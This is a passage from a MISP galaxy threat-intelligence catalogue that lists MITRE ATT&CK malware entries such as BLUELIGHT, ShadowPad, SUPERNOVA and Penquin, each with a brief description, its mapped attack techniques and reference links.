https://objective-see.com/blog/blog_0x60.html
https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/
https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/

BLUELIGHT - S0657

[BLUELIGHT](https://attack.mitre.org/software/S0657) is a remote access Trojan used by [APT37](https://attack.mitre.org/groups/G0067) that was first observed in early 2021.(Citation: Volexity InkySquid BLUELIGHT August 2021)

The tag is: misp-galaxy:mitre-malware="BLUELIGHT - S0657"

BLUELIGHT - S0657 is also known as:

BLUELIGHT

View relationships graph

BLUELIGHT - S0657 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 5132. Table References
Links
https://attack.mitre.org/software/S0657
https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

MegaCortex - S0576

[MegaCortex](https://attack.mitre.org/software/S0576) is ransomware that first appeared in May 2019. (Citation: IBM MegaCortex) [MegaCortex](https://attack.mitre.org/software/S0576) has mainly targeted industrial organizations. (Citation: FireEye Ransomware Disrupt Industrial Production)(Citation: FireEye Financial Actors Moving into OT)

The tag is: misp-galaxy:mitre-malware="MegaCortex - S0576"

MegaCortex - S0576 is also known as:

MegaCortex

View relationships graph

MegaCortex - S0576 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 5133. Table References
Links
https://attack.mitre.org/software/S0576
https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex-modifications/
https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html
https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

Dtrack - S0567

[Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack)

The tag is: misp-galaxy:mitre-malware="Dtrack - S0567"

Dtrack - S0567 is also known as:

Dtrack

View relationships graph

Dtrack - S0567 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 5134. Table References
Links
https://attack.mitre.org/software/S0567
https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers
https://securelist.com/my-name-is-dtrack/93338/
https://www.dragos.com/threat/wassonite/
https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/
https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/

TAINTEDSCRIBE - S0586

[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020)

The tag is: misp-galaxy:mitre-malware="TAINTEDSCRIBE - S0586"

TAINTEDSCRIBE - S0586 is also known as:

TAINTEDSCRIBE

View relationships graph

TAINTEDSCRIBE - S0586 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 5135. Table References
Links
https://attack.mitre.org/software/S0586
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b

XCSSET - S0658

[XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020)

The tag is: misp-galaxy:mitre-malware="XCSSET - S0658"

XCSSET - S0658 is also known as:

XCSSET
OSX.DubRobber

View relationships graph

XCSSET - S0658 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 5136. Table References
Links
https://attack.mitre.org/software/S0658
https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf
https://blog.malwarebytes.com/detections/osx-dubrobber/

EVILNUM - S0568

[EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)

The tag is: misp-galaxy:mitre-malware="EVILNUM - S0568"

EVILNUM - S0568 is also known as:

EVILNUM

View relationships graph

EVILNUM - S0568 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 5137. Table References
Links
https://attack.mitre.org/software/S0568
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html

Explosive - S0569

[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-malware="Explosive - S0569"

Explosive - S0569 is also known as:

Explosive

View relationships graph

Explosive - S0569 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 5138. Table References
Links
https://attack.mitre.org/software/S0569
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf
https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

ShadowPad - S0596

[ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)

The tag is: misp-galaxy:mitre-malware="ShadowPad - S0596"

ShadowPad - S0596 is also known as:

ShadowPad
POISONPLUG.SHADOW

View relationships graph

ShadowPad - S0596 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

Table 5139. Table References
Links
https://attack.mitre.org/software/S0596
https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
https://securelist.com/shadowpad-in-corporate-networks/81432/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf
https://content.fireeye.com/apt-41/rpt-apt41

FrozenCell - S0577

[FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)

The tag is: misp-galaxy:mitre-malware="FrozenCell - S0577"

FrozenCell - S0577 is also known as:

FrozenCell

View relationships graph

FrozenCell - S0577 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 5140. Table References
Links
https://attack.mitre.org/software/S0577
https://blog.lookout.com/frozencell-mobile-threat

SUPERNOVA - S0578

[SUPERNOVA](https://attack.mitre.org/software/S0578) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://attack.mitre.org/groups/G0016)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://attack.mitre.org/software/S0578) may have been used by the China-based threat group SPIRAL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: SolarWinds Advisory Dec 2020)(Citation: CISA Supernova Jan 2021)(Citation: Microsoft Analyzing Solorigate Dec 2020)

The tag is: misp-galaxy:mitre-malware="SUPERNOVA - S0578"

SUPERNOVA - S0578 is also known as:

SUPERNOVA

View relationships graph

SUPERNOVA - S0578 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5141. Table References
Links
https://attack.mitre.org/software/S0578
https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/
https://unit42.paloaltonetworks.com/solarstorm-supernova/
https://www.solarwinds.com/sa-overview/securityadvisory
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a
https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

Penquin - S0587

[Penquin](https://attack.mitre.org/software/S0587) is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)

The tag is: misp-galaxy:mitre-malware="Penquin - S0587"

Penquin - S0587 is also known as:

Penquin
Penquin 2.0
Penquin_x64

View relationships graph

Penquin - S0587 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 5142. Table References
Links
https://attack.mitre.org/software/S0587
https://securelist.com/the-penquin-turla-2/67962/
https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

GoldFinder - S0597

